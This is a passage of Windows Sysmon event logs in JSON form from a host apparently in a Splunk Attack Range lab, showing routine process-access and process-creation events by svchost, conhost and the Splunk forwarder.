0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.646","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3986,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.646\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.646","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3987,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.646\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.646","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3988,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.646\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.646","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3989,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.646\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.646","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3990,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.646\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.646","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3991,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.646\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2038-5F25-0000-001033090600}\r\nTargetProcessId: 3912\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.646","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2038-5F25-0000-001033090600}","TargetProcessId":"3912","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3992,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.319\r\nProcessGuid: {41C8662E-2039-5F25-0000-0010210B0600}\r\nProcessId: 4580\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.319","ProcessGuid":"{41C8662E-2039-5F25-0000-0010210B0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3993,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.318\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2039-5F25-0000-0010210B0600}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.318","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2039-5F25-0000-0010210B0600}","TargetProcessId":"4580","TargetImage":"C:\\Program 